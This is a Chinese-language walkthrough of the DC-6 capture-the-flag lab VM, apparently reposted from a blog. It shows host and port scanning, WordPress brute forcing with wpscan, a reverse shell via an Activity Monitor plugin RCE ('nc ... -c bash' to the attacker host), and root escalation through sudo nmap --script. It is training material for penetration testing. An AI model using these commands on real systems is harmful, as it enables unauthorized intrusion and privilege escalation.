11.100个渗透测试实战#11(DC-6)

本文阅读 8 分钟
首页 代码,C/C#/C++ 正文

世间一切皆可努力

目录

一、实验环境

二、实验流程

三、实验步骤:

(一)信息收集——主机探测阶段

1.查看kali的网卡信息;(网卡名:eth0,IP地址:192.168.97.129)

2.查看靶机的页面;

3.探测特定网络内的主机存活状态;(netdiscover、arp-scan、nmap)

4.分析所得:

(二)信息收集——端口(服务)扫描阶段

1.扫描全端口,服务,靶机运行的操作系统;

2.分析所得:

(三)渗透测试——80端口

1.遍历靶机网站的目录;

2.在扫描的同时,访问主页、robots.txt、指纹识别;

3.逐个访问,以上扫描的结果;

4.分析所得:

5.尝试wpscan进行破解用户;

6.尝试wpscan暴力破解;

7.利用爆破得出的结果,登录后台页面;

8.分析所得:

(四)渗透测试——Getshell

1.kali上利用该插件对应的PoC;

2.转换为交互式shell;

(五)渗透测试——致命连问,进一步信息收集,从而本地提权

1.开始致命连问;

2.首先探索mark的家目录;

3.graham用户家目录为空;

4.jens家目录下有一个脚本;

5.sarah家目录下为空;

6.分析所得:

7.切换用户,继续信息收集,试试能不能利用到这个脚本;

8.向backups.sh内写入/bin/bash,尝试执行该脚本;

9.利用nmap,提权;

10.进入root家目录,获取flag;

(六)清楚痕迹,留下后门

四、总结

1.activity monitor存在着RCE漏洞;

2.sudo权限的滥用,有很大风险;

3.nmap --script=xxx,可以执行脚本;

 

  • 靶机:DC-6,IP地址:192.168.97.157
  • 测试机:kali,IP地址:192.168.97.129
  • 测试机:物理机Win10
  • 连接方式:VM的NAT
  • 信息收集——主机探测阶段
  • 信息收集——端口(服务)扫描阶段
  • 渗透测试——80端口(wpscan爆破后台页面登录账号)
  • 渗透测试——Getshell(利用activity monitor漏洞)
  • 渗透测试——本地提权(利用sudo+nmap提权)
  • 清楚痕迹,留下后门

(一)信息收集——主机探测阶段

1.查看kali的网卡信息;(网卡名:eth0,IP地址:192.168.97.129)

  • ifconfig -a

           -a   all,所有信息

img

2.查看靶机的页面;

img

3.探测特定网络内的主机存活状态;(netdiscover、arp-scan、nmap)

  • netdiscover -i eth0 -r 192.168.97.0/24

            -i   指定出口网卡

            -r   指定待扫描的网段

img

  • arp-scan -l

            --localnet or -l  指定扫描本地网络

img

  • nmap -sP 192.168.97.0/24

           -s   scan,扫描

           -P  ping扫描,且不进行端口扫描

img

4.分析所得:

  • 靶机:192.168.97.157(wordy)
  • 测试机kali:192.168.97.129

(二)信息收集——端口(服务)扫描阶段

1.扫描全端口,服务,靶机运行的操作系统;

  • nmap -p- -sV -O -A 192.168.97.157

            -p-      扫描全端口

            -sV     扫描开启的端口的对应服务

            -O      扫描靶机操作系统

            -A      扫描靶机操作系统

img

2.分析所得:

  • 扫描全端口,只有两个端口打开;
  • 22端口处于open状态,对应开启的服务是ssh;
  • 80端口处于open状态,对应开启的服务是http,中间件是Apache;
  • 网站的主题是Wordy,CMS应该是WordPress;
  • 靶机操作系统是Debian,内核版本处于3.2到4.9之间;

(三)渗透测试——80端口

1.遍历靶机网站的目录;

          如下图所示,扫描到了14个目录

img

  • 遇见扫描

img

2.在扫描的同时,访问主页、robots.txt、指纹识别;

           如下图所示,我们的网站被301重定向到了http://wordy,这里我们就需要手动的把IP地址定向到wordy

           不知道301和302的点击这里: 301与302状态码的介绍

img

  • windows修改:C:WindowsSystem32driversetchosts文件即可

img

img

 

             f12,查看源码,无可用信息

img

  • Wapplyzer指纹识别

img

img

3.逐个访问,以上扫描的结果;

          如下图所示,该页面有登录页面的超链接

img

       点击login_page,跳转到登录页面

img

           如下图所示,该页面也可以定向到登陆页面

img

img

            如下图所示,该页面也跳转到了登录页

img

  • 其余页面,就是需要认证后再能够访问;还有的只是存在页面,但是实际源代码都是注释,由于php是解释性语言,所以也看不到任何信息

4.分析所得:

  • 一个登录页:http://wordy/wp-login.php
  • 从这里得到的,无任何的提示(下载靶机的地方,有个提示,用到了字典rockyou.txt)
  • 提示内容:

                    OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain                                process to finish” kind of advice for those who just want to get on with the job.

                    cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt That should save you a few years. ?

5.尝试wpscan进行破解用户;

             --url       待爆破的页面URL

            -e  u       爆破用户名

      如下图所示,爆破出了5个用户

img

  • 把爆破结果,写入用户名字典:name.dic

img

6.尝试wpscan暴力破解;

  • 首先根据作者的提示,创建密码字典:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
  • wpscan --url http://wordy ; -U name.dic -P passwrods.txt

         -U   用户名字典

         -P   密码字典

     如下图所示,得出账号密码

img

7.利用爆破得出的结果,登录后台页面;

  • 登录,mark:helpdesk01

        如下图所示,发现了Activity monitor插件,kali有相应的远程代码执行漏洞

img

8.分析所得:

  • 登录后台,发现了activity monitor插件,存在rce漏洞;

(四)渗透测试——Getshell

1.kali上利用该插件对应的PoC;

  • searchsploit activity monitor wordpress

img

  • searchsploit -m 45274.html

img

  • cat 45274.html  查看exp的使用方法

img

  • 翻译描述信息

            如下图所示,只要单击了我的恶意链接即可

img

  • 修改PoC

         如下图所示,修改URL为靶机的,修改nc命令为:nc -nv 192.168.97.129 8443 -c bash(IP端口为自己kali的)

img

  • 利用PoC:只要点击了链接即可

          第一步:kali侦听  nc -nvlp 8443

         img

          第二步:kali打开临时的http server服务,以便浏览器访问:python -m SimpleHTTPServer

         img

          第三步:浏览器访问http://192.168.97.129/45274.html,点击Submit request,即可反弹Shell到kali

          img

          img

  • 如下图,成功得到shell

img

2.转换为交互式shell;

  • python -c 'import pty;pty.spawn("/bin/bash")'

img

(五)渗透测试——致命连问,进一步信息收集,从而本地提权

1.开始致命连问;

  • whoami

img

  • id

img

  • pwd

img

  • ls

img

  • cd ..
  • ls -l

img

  • ls /home

img

  • cat /etc/passwd

img

2.首先探索mark的家目录;

  • cd /home/mark
  • ls -l
  • cd stuff
  • cat things-to-do.txt

          如下图所示,在mark的家目录发现了graham的密码为:GSo7isUM1D4

img

3.graham用户家目录为空;

  • cd /home/graham
  • ls -l

img

4.jens家目录下有一个脚本;

  • cd /home/jens
  • ls -l

img

  • cat backups.sh

           如下图所示,是sh脚本,用来把网站打包

img

5.sarah家目录下为空;

  • cd /home/sarah
  • ls -l

img

6.分析所得:

  • graham:GSo7isUM1D4
  • 还有一个脚本

7.切换用户,继续信息收集,试试能不能利用到这个脚本;

  • su graham,切换用户

img

  • sudo -l

         如下图所示,发现我们有jens的sudo权限,且空密码,就可以执行脚本backups.sh

img

8.向backups.sh内写入/bin/bash,尝试执行该脚本;

  • cd /home/jens
  • echo "/bin/bash" >> backups.sh         (写入bash)
  • cat backups.sh

img

  • sudo -u jens ./backups.sh

img

  • ls

img

  • sudo -l

           如下图所示,发现我们有root的sudo权限,且空密码,就可以执行/usr/bin/nmap命令

img

9.利用nmap,提权;

  • nmap  -h

        如下图所示,发现我们可以利用--script参数执行脚本

img

  • 构造脚本,pr

       cd  /tmp

       touch pr

       echo 'os.execute("/bin/sh")'  >  pr

img

  • 使用sudo命令,以root权限执行该脚本

      sudo nmap --script=pr

img

10.进入root家目录,获取flag;

  • cd /root
  • ls
  • cat theflag.txt

img

(六)清楚痕迹,留下后门

1.activity monitor存在着RCE漏洞;

2.sudo权限的滥用,有很大风险;

3.nmap --script=xxx,可以执行脚本;

本文为互联网自动采集或经作者授权后发布,本文观点不代表立场,若侵权下架请联系我们删帖处理!文章出自:https://blog.csdn.net/qq_45555226/article/details/105228543
-- 展开阅读全文 --
KillDefender 的 Beacon 对象文件 PoC 实现
« 上一篇 02-09
Web安全—逻辑越权漏洞(BAC)
下一篇 » 03-13

发表评论

成为第一个评论的人

热门文章

标签TAG

最近回复